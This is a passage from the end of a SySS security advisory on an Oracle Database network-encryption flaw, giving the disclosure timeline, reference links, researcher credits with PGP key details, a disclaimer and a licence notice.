/>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2013-03-02: Vulnerability discovered<br />2021-03-17: Vulnerability reported to manufacturer<br />2021-07-20: Initial patch release by manufacturer, <br />2021-08-07: Final patches released by manufacturer<br />2021-12-10: Public disclosure of vulnerability<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for Oracle Database<br /> https://www.oracle.com/database/<br />[2] SySS Security Advisory SYSS-2021-062 <br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-062.txt<br />[3] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy<br />[4] Paper "Oracle Native Network Encryption" <br /> https://www.syss.de/fileadmin/dokumente/Publikationen/2021/2021_Oracle_NNE.pdf<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Moritz Bechler of SySS GmbH.<br /><br />E-Mail: moritz.bechler@syss.de<br />Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Bechler.asc<br />Key ID: 0x768EFE2BB3E53DDA<br />Key Fingerprint: 2C8F F101 9D77 BDE6 465E CCC2 768E FE2B B3E5 3DDA<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is" <br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS website.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /><br /></code></pre>